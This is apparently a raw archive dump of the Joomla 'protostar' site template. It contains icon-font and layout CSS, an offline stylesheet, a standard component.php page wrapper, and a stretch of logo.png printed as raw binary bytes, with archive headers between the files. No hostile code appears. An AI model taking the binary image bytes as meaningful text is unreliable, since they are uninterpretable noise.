.icon-cancel-circle:before {
	content: "\e217";
}
.icon-checkmark-2:before {
	content: "\e218";
}
.icon-checkmark-circle:before {
	content: "\e219";
}
.icon-info:before {
	content: "\e220";
}
.icon-info-2:before,
.icon-info-circle:before {
	content: "\e221";
}
.icon-question:before,
.icon-question-sign:before,
.icon-help:before {
	content: "\45";
}
.icon-question-2:before,
.icon-question-circle:before {
	content: "\e222";
}
.icon-notification:before {
	content: "\e223";
}
.icon-notification-2:before,
.icon-notification-circle:before {
	content: "\e224";
}
.icon-pending:before,
.icon-warning:before {
	content: "\48";
}
.icon-warning-2:before,
.icon-warning-circle:before {
	content: "\e225";
}
.icon-checkbox-unchecked:before {
	content: "\3d";
}
.icon-checkin:before,
.icon-checkbox:before,
.icon-checkbox-checked:before {
	content: "\3e";
}
.icon-checkbox-partial:before {
	content: "\3f";
}
.icon-square:before {
	content: "\e226";
}
.icon-radio-unchecked:before {
	content: "\e227";
}
.icon-radio-checked:before,
.icon-generic:before {
	content: "\e228";
}
.icon-circle:before {
	content: "\e229";
}
.icon-signup:before {
	content: "\e230";
}
.icon-grid:before,
.icon-grid-view:before {
	content: "\58";
}
.icon-grid-2:before,
.icon-grid-view-2:before {
	content: "\59";
}
.icon-menu:before {
	content: "\5a";
}
.icon-list:before,
.icon-list-view:before {
	content: "\31";
}
.icon-list-2:before {
	content: "\e231";
}
.icon-menu-3:before {
	content: "\e232";
}
.icon-folder-open:before,
.icon-folder:before {
	content: "\2d";
}
.icon-folder-close:before,
.icon-folder-2:before {
	content: "\2e";
}
.icon-folder-plus:before {
	content: "\e234";
}
.icon-folder-minus:before {
	content: "\e235";
}
.icon-folder-3:before {
	content: "\e236";
}
.icon-folder-plus-2:before {
	content: "\e237";
}
.icon-folder-remove:before {
	content: "\e238";
}
.icon-file:before {
	content: "\e016";
}
.icon-file-2:before {
	content: "\e239";
}
.icon-file-add:before,
.icon-file-plus:before {
	content: "\29";
}
.icon-file-minus:before {
	content: "\e017";
}
.icon-file-check:before {
	content: "\e240";
}
.icon-file-remove:before {
	content: "\e241";
}
.icon-save-copy:before,
.icon-copy:before {
	content: "\e018";
}
.icon-stack:before {
	content: "\e242";
}
.icon-tree:before {
	content: "\e243";
}
.icon-tree-2:before {
	content: "\e244";
}
.icon-paragraph-left:before {
	content: "\e246";
}
.icon-paragraph-center:before {
	content: "\e247";
}
.icon-paragraph-right:before {
	content: "\e248";
}
.icon-paragraph-justify:before {
	content: "\e249";
}
.icon-screen:before {
	content: "\e01c";
}
.icon-tablet:before {
	content: "\e01d";
}
.icon-mobile:before {
	content: "\e01e";
}
.icon-box-add:before {
	content: "\51";
}
.icon-box-remove:before {
	content: "\52";
}
.icon-download:before {
	content: "\e021";
}
.icon-upload:before {
	content: "\e022";
}
.icon-home:before {
	content: "\21";
}
.icon-home-2:before {
	content: "\e250";
}
.icon-out-2:before,
.icon-new-tab:before {
	content: "\e024";
}
.icon-out-3:before,
.icon-new-tab-2:before {
	content: "\e251";
}
.icon-link:before {
	content: "\e252";
}
.icon-picture:before,
.icon-image:before {
	content: "\2f";
}
.icon-pictures:before,
.icon-images:before {
	content: "\30";
}
.icon-palette:before,
.icon-color-palette:before {
	content: "\e014";
}
.icon-camera:before {
	content: "\55";
}
.icon-camera-2:before,
.icon-video:before {
	content: "\e015";
}
.icon-play-2:before,
.icon-video-2:before,
.icon-youtube:before {
	content: "\56";
}
.icon-music:before {
	content: "\57";
}
.icon-user:before {
	content: "\22";
}
.icon-users:before {
	content: "\e01f";
}
.icon-vcard:before {
	content: "\6d";
}
.icon-address:before {
	content: "\70";
}
.icon-share-alt:before,
.icon-out:before {
	content: "\26";
}
.icon-enter:before {
	content: "\e257";
}
.icon-exit:before {
	content: "\e258";
}
.icon-comment:before,
.icon-comments:before {
	content: "\24";
}
.icon-comments-2:before {
	content: "\25";
}
.icon-quote:before,
.icon-quotes-left:before {
	content: "\60";
}
.icon-quote-2:before,
.icon-quotes-right:before {
	content: "\61";
}
.icon-quote-3:before,
.icon-bubble-quote:before {
	content: "\e259";
}
.icon-phone:before {
	content: "\e260";
}
.icon-phone-2:before {
	content: "\e261";
}
.icon-envelope:before,
.icon-mail:before {
	content: "\4d";
}
.icon-envelope-opened:before,
.icon-mail-2:before {
	content: "\4e";
}
.icon-unarchive:before,
.icon-drawer:before {
	content: "\4f";
}
.icon-archive:before,
.icon-drawer-2:before {
	content: "\50";
}
.icon-briefcase:before {
	content: "\e020";
}
.icon-tag:before {
	content: "\e262";
}
.icon-tag-2:before {
	content: "\e263";
}
.icon-tags:before {
	content: "\e264";
}
.icon-tags-2:before {
	content: "\e265";
}
.icon-options:before,
.icon-cog:before {
	content: "\38";
}
.icon-cogs:before {
	content: "\37";
}
.icon-screwdriver:before,
.icon-tools:before {
	content: "\36";
}
.icon-wrench:before {
	content: "\3a";
}
.icon-equalizer:before {
	content: "\39";
}
.icon-dashboard:before {
	content: "\78";
}
.icon-switch:before {
	content: "\e266";
}
.icon-filter:before {
	content: "\54";
}
.icon-purge:before,
.icon-trash:before {
	content: "\4c";
}
.icon-checkedout:before,
.icon-lock:before,
.icon-locked:before {
	content: "\23";
}
.icon-unlock:before {
	content: "\e267";
}
.icon-key:before {
	content: "\5f";
}
.icon-support:before {
	content: "\46";
}
.icon-database:before {
	content: "\62";
}
.icon-scissors:before {
	content: "\e268";
}
.icon-health:before {
	content: "\6a";
}
.icon-wand:before {
	content: "\6b";
}
.icon-eye-open:before,
.icon-eye:before {
	content: "\3c";
}
.icon-eye-close:before,
.icon-eye-blocked:before,
.icon-eye-2:before {
	content: "\e269";
}
.icon-clock:before {
	content: "\6e";
}
.icon-compass:before {
	content: "\6f";
}
.icon-broadcast:before,
.icon-connection:before,
.icon-wifi:before {
	content: "\e01b";
}
.icon-book:before {
	content: "\e271";
}
.icon-lightning:before,
.icon-flash:before {
	content: "\79";
}
.icon-print:before,
.icon-printer:before {
	content: "\e013";
}
.icon-feed:before {
	content: "\71";
}
.icon-calendar:before {
	content: "\43";
}
.icon-calendar-2:before {
	content: "\44";
}
.icon-calendar-3:before {
	content: "\e273";
}
.icon-pie:before {
	content: "\77";
}
.icon-bars:before {
	content: "\76";
}
.icon-chart:before {
	content: "\75";
}
.icon-power-cord:before {
	content: "\32";
}
.icon-cube:before {
	content: "\33";
}
.icon-puzzle:before {
	content: "\34";
}
.icon-attachment:before,
.icon-paperclip:before,
.icon-flag-2:before {
	content: "\72";
}
.icon-lamp:before {
	content: "\74";
}
.icon-pin:before,
.icon-pushpin:before {
	content: "\73";
}
.icon-location:before {
	content: "\63";
}
.icon-shield:before {
	content: "\e274";
}
.icon-flag:before {
	content: "\35";
}
.icon-flag-3:before {
	content: "\e275";
}
.icon-bookmark:before {
	content: "\e023";
}
.icon-bookmark-2:before {
	content: "\e276";
}
.icon-heart:before {
	content: "\e277";
}
.icon-heart-2:before {
	content: "\e278";
}
.icon-thumbs-up:before {
	content: "\5b";
}
.icon-thumbs-down:before {
	content: "\5c";
}
.icon-unfeatured:before,
.icon-asterisk:before,
.icon-star-empty:before {
	content: "\40";
}
.icon-star-2:before {
	content: "\41";
}
.icon-featured:before,
.icon-default:before,
.icon-star:before {
	content: "\42";
}
.icon-smiley:before,
.icon-smiley-happy:before {
	content: "\e279";
}
.icon-smiley-2:before,
.icon-smiley-happy-2:before {
	content: "\e280";
}
.icon-smiley-sad:before {
	content: "\e281";
}
.icon-smiley-sad-2:before {
	content: "\e282";
}
.icon-smiley-neutral:before {
	content: "\e283";
}
.icon-smiley-neutral-2:before {
	content: "\e284";
}
.icon-cart:before {
	content: "\e019";
}
.icon-basket:before {
	content: "\e01a";
}
.icon-credit:before {
	content: "\e286";
}
.icon-credit-2:before {
	content: "\e287";
}
.icon-expired:before {
	content: "\4b";
}
body {
	-webkit-font-smoothing: antialiased;
	-moz-osx-font-smoothing: grayscale;
}
body.site {
	border-top: 3px solid #0088cc;
	padding: 20px;
	background-color: #f4f6f7;
}
body.site.fluid {
	background-color: #ffffff;
}
.thumbnail {
	margin-bottom: 9px;
}
.accordion-group {
	background: #fff;
}
.site-title {
	font-size: 40px;
	font-size: calc(16px + 2.16vw);
	line-height: 48px;
	font-weight: bold;
}
@media (min-width: 1024px) {
	.site-title {
		font-size: 40px;
	}
}
.brand {
	color: #001a27;
	-webkit-transition: color .5s linear;
	-moz-transition: color .5s linear;
	-o-transition: color .5s linear;
	transition: color .5s linear;
}
.brand:hover {
	color: #005e8d;
	text-decoration: none;
}
.header {
	margin-bottom: 10px;
}
.header .finder {
	margin-top: 14px;
}
.header .finder .btn {
	margin-top: 0px;
}
.navigation {
	padding: 5px 0;
	border-top: 1px solid rgba(0,0,0,0.075);
	border-bottom: 1px solid rgba(0,0,0,0.075);
	margin-bottom: 10px;
}
.navigation .nav-pills {
	margin-bottom: 0;
}
.hero-unit {
	background-color: #08C;
}
.hero-unit > * {
	color: white;
	text-shadow: 1px 1px 1px rgba(0,0,0,0.5);
}
.container {
	max-width: 960px;
}
.body .container {
	background-color: #fff;
	-moz-border-radius: 4px;
	-webkit-border-radius: 4px;
	border-radius: 4px;
	padding: 20px;
	border: 1px solid rgba(0,0,0,0.15);
	-moz-box-shadow: 0px 0px 6px rgba(0,0,0,0.05);
	-webkit-box-shadow: 0px 0px 6px rgba(0,0,0,0.05);
	box-shadow: 0px 0px 6px rgba(0,0,0,0.05);
}
.well .page-header {
	margin: 0px 0px 5px 0px;
}
h1,
h2,
h3,
h4,
h5,
h6 {
	margin: 12px 0;
	word-wrap: break-word;
}
h1 {
	font-size: 26px;
	line-height: 28px;
}
h2 {
	font-size: 22px;
	line-height: 24px;
}
h3 {
	font-size: 18px;
	line-height: 20px;
}
h4 {
	font-size: 14px;
	line-height: 16px;
}
h5 {
	font-size: 13px;
	line-height: 15px;
}
h6 {
	font-size: 12px;
	line-height: 14px;
}
.module-header {
	padding-bottom: 17px;
	margin: 20px 0 18px 0;
	border-bottom: 1px solid #eeeeee;
}
p {
	word-wrap: break-word;
}
.item-title {
	margin-bottom: 9px;
}
.item-content {
	margin: 18px 0;
}
.item-subtitle {
	margin-bottom: 9px;
}
.pull-right.item-image {
	margin: 0 0 18px 20px;
}
.pull-left.item-image {
	margin: 0 20px 18px 0;
}
.header .nav > li:last-child > .dropdown-menu,
.item-actions .dropdown-menu,
.item-comment .dropdown-menu {
	left: initial;
	right: 0;
}
.article-index {
	margin: 0 0 10px 10px;
}
.list-item-title {
	margin-bottom: 9px;
}
.list-item-content {
	margin: 18px 0;
}
.list-item-subtitle {
	margin-bottom: 9px;
}
.items-more,
.content-links {
	padding: 15px 0;
}
.breadcrumb {
	margin: 10px 0;
}
.breadcrumb > li,
.breadcrumb > .active {
	color: #515151;
}
#login-form {
	margin-top: 8px;
}
.add-on + #modlgn-username,
.add-on + #modlgn-passwd {
	width: 132px;
}
.img_caption .left {
	float: left;
	margin-right: 1em;
}
.img_caption .right {
	float: right;
	margin-left: 1em;
}
.img_caption .left p {
	clear: left;
	text-align: center;
}
.img_caption .right p {
	clear: right;
	text-align: center;
}
.img_caption {
	text-align: center !important;
}
.img_caption.none {
	margin-left: auto;
	margin-right: auto;
}
figure {
	display: table;
}
figure.pull-center,
img.pull-center {
	margin-left: auto;
	margin-right: auto;
}
figcaption {
	display: table-caption;
	caption-side: bottom;
}
#aside .nav .nav-child {
	border-left: 2px solid #ddd;
	padding-left: 5px;
}
.navigation .nav-child {
	position: absolute;
	top: 95%;
	left: 0;
	z-index: 1000;
	display: none;
	float: left;
	min-width: 160px;
	padding: 5px 0;
	margin: 2px 0 0;
	list-style: none;
	background-color: #fff;
	border: 1px solid #ccc;
	border: 1px solid rgba(0,0,0,0.2);
	*border-right-width: 2px;
	*border-bottom-width: 2px;
	-webkit-border-radius: 6px;
	-moz-border-radius: 6px;
	border-radius: 6px;
	-webkit-box-shadow: 0 5px 10px rgba(0,0,0,0.2);
	-moz-box-shadow: 0 5px 10px rgba(0,0,0,0.2);
	box-shadow: 0 5px 10px rgba(0,0,0,0.2);
	-webkit-background-clip: padding-box;
	-moz-background-clip: padding;
	background-clip: padding-box;
}
.navigation .nav-child.pull-right {
	right: 0;
	left: auto;
}
.navigation .nav-child .divider {
	*width: 100%;
	height: 1px;
	margin: 8px 1px;
	*margin: -5px 0 5px;
	overflow: hidden;
	background-color: #e5e5e5;
	border-bottom: 1px solid #fff;
}
.navigation .nav-child a {
	display: block;
	padding: 3px 20px;
	clear: both;
	font-size: 13px;
	font-weight: normal;
	line-height: 18px;
	color: #333;
	white-space: nowrap;
}
.navigation .nav li {
	position: relative;
}
.navigation .nav > li:hover > .nav-child,
.navigation .nav > li > a:focus + .nav-child,
.navigation .nav li li:hover > .nav-child,
.navigation .nav li li > a:focus + .nav-child {
	display: block;
}
.navigation .nav > li:before {
	position: absolute;
	top: 100%;
	right: 0;
	left: 0;
	height: 6px;
	content: '';
}
.navigation .nav > li > .nav-child:before {
	position: absolute;
	top: -7px;
	left: 9px;
	display: inline-block;
	border-right: 7px solid transparent;
	border-bottom: 7px solid #ccc;
	border-left: 7px solid transparent;
	border-bottom-color: rgba(0,0,0,0.2);
	content: '';
}
.navigation .nav > li > .nav-child:after {
	position: absolute;
	top: -6px;
	left: 10px;
	display: inline-block;
	border-right: 6px solid transparent;
	border-bottom: 6px solid #ffffff;
	border-left: 6px solid transparent;
	content: '';
}
.navigation .nav li li .nav-child {
	top: -8px;
	left: 100%;
}
.navigation .nav li li .nav-child:before {
	position: absolute;
	top: 9px;
	left: -7px;
	display: inline-block;
	border-top: 7px solid transparent;
	border-right: 7px solid rgba(0,0,0,0.2);
	border-bottom: 7px solid transparent;
	content: '';
}
.navigation .nav li li .nav-child:after {
	position: absolute;
	top: 10px;
	left: -6px;
	display: inline-block;
	border-top: 6px solid transparent;
	border-right: 6px solid #ffffff;
	border-bottom: 6px solid transparent;
	content: '';
}
.navigation .nav-child li > a:hover,
.navigation .nav-child li > a:focus,
.navigation .nav-child:hover > a {
	text-decoration: none;
	color: #fff;
	background-color: #005e8d;
	background-color: #005783;
	background-image: -moz-linear-gradient(top,#005e8d,#004d74);
	background-image: -webkit-gradient(linear,0 0,0 100%,from(#005e8d),to(#004d74));
	background-image: -webkit-linear-gradient(top,#005e8d,#004d74);
	background-image: -o-linear-gradient(top,#005e8d,#004d74);
	background-image: linear-gradient(to bottom,#005e8d,#004d74);
	background-repeat: repeat-x;
	filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#ff005e8d', endColorstr='#ff004c73', GradientType=0);
}
.categories-list .collapse {
	margin-left: 20px;
}
@media (max-width: 480px) {
	.item-info > span {
		display: block;
	}
	.blog-item .pull-right.item-image {
		margin: 0 0 18px 0;
	}
	.blog-item .pull-left.item-image {
		margin: 0 0 18px 0;
		float: none;
	}
}
@media (max-width: 768px) {
	body {
		-webkit-overflow-scrolling: touch;
		padding-top: 0;
	}
	.header {
		background: transparent;
	}
	.header .brand {
		float: none;
		display: block;
		text-align: center;
	}
	.header .nav.pull-right,
	.header-search {
		float: none;
		display: block;
	}
	.header-search form {
		margin: 0;
	}
	.header-search .search-query {
		width: 90%;
	}
	.header .nav-pills > li > a {
		border: 1px solid #ddd;
		border-bottom: 0;
		margin: 0;
		-webkit-border-radius: 0;
		-moz-border-radius: 0;
		border-radius: 0;
		margin-right: 0;
	}
	.header .nav-pills > li:first-child > a {
		-webkit-border-radius: 4px 4px 0 0;
		-moz-border-radius: 4px 4px 0 0;
		border-radius: 4px 4px 0 0;
	}
	.header .nav-pills > li:last-child > a {
		-webkit-border-radius: 0 0 4px 4px;
		-moz-border-radius: 0 0 4px 4px;
		border-radius: 0 0 4px 4px;
		border-bottom: 1px solid #ddd;
	}
	.modal.fade {
		top: -100%;
	}
	.nav-tabs {
		border-bottom: 0;
	}
	.nav-tabs > li {
		float: none;
	}
	.nav-tabs > li > a {
		border: 1px solid #ddd;
		-webkit-border-radius: 0;
		-moz-border-radius: 0;
		border-radius: 0;
		margin-right: 0;
	}
	.nav-tabs > li:first-child > a {
		-webkit-border-radius: 4px 4px 0 0;
		-moz-border-radius: 4px 4px 0 0;
		border-radius: 4px 4px 0 0;
	}
	.nav-tabs > li:last-child > a,
	.nav-tabs > .active:last-child > a {
		-webkit-border-radius: 0 0 4px 4px;
		-moz-border-radius: 0 0 4px 4px;
		border-radius: 0 0 4px 4px;
		border-bottom: 1px solid #ddd;
	}
	.nav-tabs > li > a:hover {
		border-color: #ddd;
		z-index: 2;
	}
	.nav-tabs.nav-dark > li > a {
		border: 1px solid #333;
	}
	.nav-tabs > li:last-child > a,
	.nav-tabs > .active:last-child > a {
		border-bottom: 1px solid #333;
	}
	.nav-tabs.nav-dark > li > a:hover {
		border-color: #333;
	}
	.nav-pills > li {
		float: none;
	}
	.nav-pills > li > a {
		margin-right: 0;
	}
	.nav-pills > li > a {
		margin-bottom: 3px;
	}
	.nav-pills  > li:last-child > a {
		margin-bottom: 1px;
	}
	.form-search > .pull-left,
	.form-search > .pull-right {
		float: none;
		display: block;
		margin-bottom: 9px;
	}
}
@media (max-width: 980px) {
	.navbar-fixed-top {
		margin-bottom: 0 !important;
	}
	.item-comment .item-image {
		display: none;
	}
	.well {
		padding: 10px;
	}
}
@media (max-width: 979px) {
	.nav-collapse.in.collapse {
		overflow: visible;
		height: 0;
		z-index: 100;
	}
	.nav-collapse .nav > li.active > a {
		color: #fff;
	}
	.nav-collapse .nav > li.active > a:hover {
		color: #555;
	}
}
@media (min-width: 768px) and (max-width: 979px) {
	#login-form .input-small {
		width: 62px;
	}
}
dl.tabs {
	float: left;
	margin-bottom: -1px;
}
dl.tabs dt.tabs {
	float: left;
	margin-left: 3px;
	padding: 4px 10px;
	background-color: #F0F0F0;
	border-top: 1px solid #CCC;
	border-left: 1px solid #CCC;
	border-right: 1px solid #CCC;
}
dl.tabs dt:hover {
	background-color: #F9F9F9;
}
dl.tabs dt.open {
	background-color: #FFF;
	border-bottom: 1px solid #FFF;
}
dl.tabs dt.tabs h3 {
	margin: 0;
	font-size: 1.1em;
	font-weight: normal;
}
dl.tabs dt.tabs h3 a {
	color: #0088CC;
}
dl.tabs dt.tabs h3 a:hover {
	color: #005580;
	text-decoration: none;
}
dl.tabs dt.open h3 a {
	color: #000;
	text-decoration: none;
}
div.current dd.tabs {
	margin: 0;
	padding: 10px;
	clear: both;
	border: 1px solid #CCC;
	background-color: #FFF;
}
#pop-print {
	float: right;
	margin: 10px;
}
code {
	white-space: pre-wrap;
}
#filter-search {
	vertical-align: top;
}
.editor {
	overflow: hidden;
	position: relative;
}
.search span.highlight {
	background-color: #FFFFCC;
	font-weight: bold;
	padding: 1px 0;
}
dt.result-title {
	word-wrap: break-word;
}
dd.result-text {
	word-wrap: break-word;
}
body.modal-open {
	overflow: hidden;
	-ms-overflow-style: none;
}
#users-profile-custom label {
	display: inline;
}
.controls > .radio:first-child,
.controls > .checkbox:first-child {
	padding-top: 0;
}
.form-horizontal .controls > .radio:first-child,
.form-horizontal .controls > .checkbox:first-child {
	padding-top: 5px;
}
.form-horizontal .controls > .radio.btn-group:first-child {
	padding-top: 0;
}
.field-media-wrapper .modal .modal-body {
	padding: 5px 10px;
	overflow: hidden;
}
#search-results {
	clear: both;
}
#finder-filter-window {
	overflow: visible;
}
#finder-search .in.collapse {
	overflow: visible;
}
.well select,
.well .chzn-container {
	max-width: 100%;
}
.container-popup {
	padding: 28px 10px 10px 10px;
}
li {
	word-wrap: break-word;
}
ul.manager .height-50 .icon-folder-2 {
	height: 35px;
	width: 35px;
	line-height: 35px;
	font-size: 30px;
}
.popover-content {
	min-height: 33px;
}
.finder-selects {
	margin: 0 15px 15px 0;
}
.header-search .mod-languages ul {
	margin: 0 0 5px 0;
}
.rtl .navigation .nav-child {
	left: auto;
	right: 0;
}
.rtl .navigation .nav > li > .nav-child:before {
	left: auto;
	right: 12px;
}
.rtl .navigation .nav > li > .nav-child:after {
	left: auto;
	right: 13px;
}
.rtl .categories-list .collapse {
	margin: 0 20px 0 0;
}
.rtl .modal-footer button {
	float: left;
}
.rtl .finder-selects {
	margin: 0 0 15px 15px;
}
PK!y���protostar/css/offline.cssnu&1i�/**
 * @copyright	Copyright (C) 2005 - 2020 Open Source Matters, Inc. All rights reserved.
 * @license	GNU General Public License version 2 or later; see LICENSE.txt
 */

body.site {
	margin: 0;
	padding: 0;
}

.outer {
	display: table;
	position: absolute;
	height: 100%;
	width: 100%;
}

.middle {
	display: table-cell;
	vertical-align: middle;
}

.inner {
	margin: 0 auto;
	max-width: 30em;
	background-color: #ffffff;
}

.header {
	text-align: center;
	margin: 0 0 1em 0;
}

img {
	max-width: 100%;
	height: auto;
	border: 0;
}

form, fieldset {
	margin: 0;
	padding: 0;
}

label {
	display: block;
	margin: 0;
}

input[type="text"], input[type="password"] {
	box-sizing: border-box;
	width: 100%;
	height: auto;
}

input {
	margin: .5em 0 1em 0;
}
PK!�=#66protostar/component.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  Templates.protostar
 *
 * @copyright   Copyright (C) 2005 - 2020 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

/** @var JDocumentHtml $this */

$app = JFactory::getApplication();

// Output as HTML5
$this->setHtml5(true);

// Add JavaScript Frameworks
JHtml::_('bootstrap.framework');

// Add template js
JHtml::_('script', 'template.js', array('version' => 'auto', 'relative' => true));

// Add html5 shiv
JHtml::_('script', 'jui/html5.js', array('version' => 'auto', 'relative' => true, 'conditional' => 'lt IE 9'));

// Add Stylesheets
JHtml::_('stylesheet', 'template.css', array('version' => 'auto', 'relative' => true));

// Load optional rtl Bootstrap css and Bootstrap bugfixes
JHtml::_('bootstrap.loadCss', $includeMaincss = false, $this->direction);
?>
<!DOCTYPE html>
<html lang="<?php echo $this->language; ?>" dir="<?php echo $this->direction; ?>">
<head>
	<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />
	<jdoc:include type="head" />
</head>
<body class="contentpane modal<?php echo $this->direction === 'rtl' ? ' rtl' : ''; ?>">
	<jdoc:include type="message" />
	<jdoc:include type="component" />
</body>
</html>
PK!9��gs#s#protostar/images/logo.pngnu&1i��PNG


IHDR,<�܇Z#:IDATx��t���9ww��g�ꍲ���B��ʹ��!I9ww� )9��!�sww�,I��R����o���l�m�ogvZ.�e�sak�@����|�l���-N�d�UM��+�F�f�(!���L#�/�;�u_�)ʲCY�I��n}_��K�$�Z������� n�4�l��h��߃MLd#�2��0{-"�v?H6HQ��7���s�4_�͖q
�Y�Z�WC�KԷ�z�qv�
��Vh$��m�L�z��U4„He‹�1��kf���(Jy�n�I�V���9��a�bUT=Ĭ��5�Kqo0NVh�e�o �L%�SQ2d��ˣ��D��(�y�goҸ�b�K�(�7�!�5�4�̨c�e?�V�J2(�
��D̳@���'����U�ߊU�r�Ƨ�"�<@�A�Ư����cFɱ��Ӿl�1�E)Oȟp]h)5Ty��v�N0L�00ӵ�E��sv��hi��2#ۥ��|��yĽq&D���-�gB�!�E)O��	���/�?����c)�b|�M�g��D_'ߤ��09������!r�)'�#��WR:L�6��]X7ˌ�%��$'��}ZE0�<@�GQ�\�`�Ył�-�_��A�&'[<���U�(��}�����L�/D���}�ʟǂ�z���*?���`��������#o�
�uo��������"b\޿!bdM�ʏ�(���n�M�%+Z-�_�$� ��yU�$�QZ�2��PyRyS�S��PK���[��������.��!�d�L�
�Q~,@#���@Y5�f��&��(9�,��.��"��ܾ�`��r��Y9�g�w�"@�TTT�>i�{
���^��5!&3�w��4V�:��R��'�c��({I4[C�a!��!��x�o�H�uZ�5r/�F�u)JNM
�RӜ7��O���������ǯ�k��r���p_��7/F�`Lǃ�����^�wA�u��ສ��
�!�Յ�|n�Iz�@��)b�+k�>Bφ������`�F3:fBrع���~)JNM�}�f#?�C�Z�}7�ʍ<Zš���0�}�8]�u��k� ��3���h�i��:��.�����3�H������¿�o���#
��Ş7@�����a�!��E���"g��%���C��f��h�19k� $S���}�Q��1k�k�H��u�P��+	!����Vp�`i�F��=;v^�ۜ]s^�m�M#Gi��pox<��|���җdOAt~�&y)�4�R��xɟ�>�y��q7���|�����'�q!"LN��4|���3a�L&�.JG�9f�ݓѯ��L"D�O��T���h���OQ�˜���v������G���]�;记��z-�
�Mo����P|��;���u@$�c�	��)���g�a"��rde}>0B�M�i@�h�;B�^���TԺ���K���"HVhQ�*DQ��9��@=_q�	+��]��Mv�ۿ��D��]
����<g�ɺ����J�/��`	P!���^���^�}O4�����|�M���V}a�20�y*�#��5�B*X)jHH�ú�'T��1�Վ�K:&}�d@6yH����<��v�������-|	
�U�"tV
��[�3Q�Q_Cա�m����L�y�{��"Gi��D���h���OQ�� �
�}�SZ�1�A>�c����m��8�M��Zh���y�4���W��E	~
@�d�O�F臥�Jn�n���+�ǹm{�1f���9W��g6�X��^lh(��`E�~�F*X�,�.}��yT\��^��M��V��70&�4��^]]���<�VR�K���:��#Z��H'�7�R欬I�쓾�j��DZm"m������^ Z�E����n���`-#,�@����ς1&��t��A����C�M�51�L_}[�!a�K	�
w�z�J�(��a����6g�i��d��vl3��5V��1��h��n6��`-PN&B�h6�0U�Z�(*Xr��bLj1�h�,����M��^�6���W�M��[�����	nH�P'D䓒��3`�({��WyPٶ#�3?V9}2Z��p�ƒVH���τXs�I��5qO�Q�E}C,���Q������w�m�۟��})���!k-�]IN��8��9e�@�2e���9���ef%����zλ�#�-U>�{~���F����޹s�ݿz�z�����'����ep��=���o��d߸]�D*�)"'N�]��}b(p_�,�c��_n�i(��,��)?�g�;lj�<@'1k�?�������Ϗ��ׅ��Ww
�q�:U_�볂X}�u���@�VvR��"��Y}�z�� ��J�]�)&��_��"
6��8ѳ����܅.��|�&4�\V��ݫ9H��7m���ݮ���a���t���C�}�:,��K���Vљ��?��݁�_��q����Jt ;�{������X�>���7a�gKܩ�e_��<�{/���8������2)1'9&�[ bA!b0�2Q�ʶy��/q�$F���\�B�nfdn��g��&X����6��9�Y��ϻ��7�[�j��^�cs�ө�g(������?v��#V��u�<�s����|��ό���Z��Ҋ�@���,{��0�����\
D�AS���>�y��C��e����a�n��}�v!"��a��m���z�ӻ����I��TF�����t:<A���f���@�gЇuJ��8��*�۟�r�R\���nw9��}���웻�}�S�z}@��	'��}Ʊ`
�˥���鸠�G�?q�$\?����<�!�����
/V��Em���8�lmʶo�u�*�`������x���Gd?#��<^���`%�|;o���Ѹ�|l>��ga!5�5N�(m��6Xa��E]��� �NQ�賂ج<���ԝ�!�:ђ�Vo�f��?�>��>�n:���z2��`�S�ʼn?_#/�p녇�������C�yvX�)��(��b��	�oc���H}�;�V"�6�
D$�C)J��ytJ2O�cd6�X`gs��%�Źx��mKb�m�}��fNdžsJ�tN�	s�_+�*Nh+��<�=D���d�>N�7^���X�?�`�)7��U���E�x�\��vXD+��n���
S5}�+Ip��]�>��n_���]�a����G��W+0�h���,���Q�߀HW,Ng`�O…�kHRp��p�?��z���.�E.��+��������v`��_����Dv�� ��*��
ۻe� f��¿��Bs�h�ߏ(X	��{;ˆ]�tjZ�JX�
ӟ��\dO�+��)�'������mt���1�-/W=YZk��	��mݩ`��A4f`���o��cm�ڄ	�Y@�IT�xl��4��3�>����[X�����*�_��/0����y��b��a_����V�U������H���):ç��DEL�̕>?���I�r~�U�/�7�h���@�]��Y��:M�ҭ�/d��Nj��R�3�!<��.l �!��Q�S9M���i����;ϑ�2�0|7�ٵo�}��y`����p8v����T��OЖ�j�/�Nm �X�|lq� O���k�+4���a�����&n��mN����e� ��>�sy-���6}{���$��ST��鳎�����>�=����+�����Q�=�������J��3�M���ǰ��-|Z���ӎ
���^>�����	��Փ5���O+ت���v��j�_���~� ҝx���D�:�`�������1� ��u>������NC��¾�q7��}���K�6���X�b�8&8v�t��7Z'
�V�la���sM"1�Ʌ�]�l��6E�%`�H
��<k{�!�W��;�z�����.&�!�@����F�m9�%X���������1-���O�B�D,y>���;���"�1�۵�����p���jug�ߣ��H?;�� ҝx&�%P��羡�hH���ah�����g���8 $�����b8�`�h��G��%}@��g���F��:��1��Kn�[m�Z+o@
�nЖY���
. �2���}C��	m�B8�`o��=�!�+m�?�qH����籜�$d�-�.���~@�������Y������>-=��EϾ+��~�H �`9�Z��]�27יD2`T|�f�
}���O��X���a@$�˻��Q�ip�K�/�
_YKi����G�io���.b(`� H��q���`a��{~��*o�@7p�RA�zi-X�s�}E�^}ֳ�O��P���h��Y1k����2o�v���s�V-�i95�Nov��a�=�� , Ҝh�%��-�S��@$����<їJs�#B!����c��\D2q8\��{q�4�t樂�ɿV�2�>��b(0���I�oLB�^���@�cmˋ�K+z��c	�瀓��ñ8�d��?E~o:
VaU}^Iݪ���~��j�k�?s�3i��%Z�5��wt�(�\�}qM��S�o�[�V�t�f�n��[ �O0�՛]!�<�/1��������\VO&���;���EE� :�MͫB�X��Ȑ�d��G��љ��ƽAX�b�#CEq��QLd�\�W����
��j��?6�qh���Jh���߇����2L"���8��{��`��Y�]qu�ʲ�k��5��R�V����·h�?�g��=��ޛ�g ���Y�CIm��e���k���`�ܵ�S+�_�ѷ�l�g��3��!�Zm~�miL4�����y&���X�;�T���hA�	���,
���"5��_
%�������t �
�<͂�ʗ2Z}(�k�̂�u�
�K�]��k^�����[q<�K�Jj�*�m�XI(Z����8�����~�>-�V�EoN:I�Mo�XTS�p�͚&�h�*�k�+�^v�O�{^���˧0�޼�1j; Ҕ���8�5 �@�
�@�\@N�b�)�y@�w1`Y����
D*`:���CX�l��e�d���s����
p;�1Yi�P<�]�ib�8ZC7�_p�'�0c���8���奔�x�jر����ҹk-���Dku��r��p�W�xl���X+����S�HS�
